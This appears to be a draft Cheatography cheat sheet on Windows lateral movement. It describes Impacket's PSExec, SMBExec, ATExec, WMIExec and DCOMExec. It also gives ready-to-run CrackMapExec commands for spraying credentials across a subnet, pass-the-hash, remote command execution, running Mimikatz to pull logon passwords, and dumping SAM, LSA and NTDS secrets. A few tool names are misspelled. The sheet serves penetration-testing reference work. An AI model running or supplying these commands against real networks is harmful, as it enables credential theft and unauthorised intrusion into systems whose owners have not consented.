Cheatography
                https://cheatography.com
            
        
        
    
                   
                            
    
                    Cheat Sheet for Windows Lateral Movement Techniques
                    
                 
                    
        
        
            
    
        
                                    This is a draft cheat sheet. It is a work in progress and is not finished yet.
                    
        
                
        
            
                                
            
                
                                                | Impacket
                        
                                                                                    
                                                                                            | PSExec | Writable share required, default ADMIN$. Interactive shell or single command. Similar to psexec.exe, uses RemComSVC. | SMB - 445 |  
                                                                                            | SMBExec | No writable share required. Requires 4 SMB Connections. Doesn't use RemComSVC. Semi-interactive shell or single command. | SMB - 445 |  
                                                                                            | ATExec | Writable share required, default ADMIN$. Run a single command through task scheduler. | SMB - 445 |  
                                                                                            | WMIEexe | Semi-interactive shell through WMI. No service/agent installation require, runs elevate privileges if possible. Stealthy. | RPC, WMI - 135 |  
                                                                                            | DCOMExec | Semi-interactive shell, similar to WMIexec but using different DCOM endpoints. Blocked by default due to Windows firewall rules. | RCP, DCOM - 135 |  Example: 
python <script.py> domain/user:password@IP <command>
 
PSExec, SMBExec, WMIExec will obtain shells if <command> is blank |  | CrackMapExec
                        
                                                                                    
                                                                                            | Swiss army knife for pentesting with many features. Spray credentials across environment to enumerate shares, sessions, disks, users, login privileges, execute commands, dump SAM and LSA secrets, run mimikatz, and more. Can perform command execution via Impacket's smbexec, wmiexec, atexec.
 |  
                                                                                            | Spray domain creds: crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' -d domain.com
 |  
                                                                                            | Spray local creds: crackmapexec 192.168.1.0/24 -u user -p 'P@ssw0rd' --local-user
 |  
                                                                                            | Spray creds from files: crackmapexec 192.168.1.0/24 -u users.txt -p passwords.txt
 |  
                                                                                            | Pass-the-hash: crackmapexec 192.168.1.0/24 -u user -H NTLMhash
 |  
                                                                                            | Execute command: crackmapexec 192.168.1.0/24 -u user -p 'password' --exec-method smbexec -x whoami
 |  
                                                                                            | Run Mimikatz: crackmapexec 192.168.1.0/24 -u user -p 'password' -M modules/credentials/mimiaktz.py -o COMMAND='privilege::debug;sekurlsa::logonpasswords'
 |  
                                                                                            | Common Enumeration Options |  
                                                                                            | Enumerate shares:  --shares
 |  
                                                                                            | Dump sam, lsa or ntds:  --sam
 --lsa
 --ntds
 |  
                                                                                            |  |  
                                                                                            | Logged on users:  --lusers
 |  |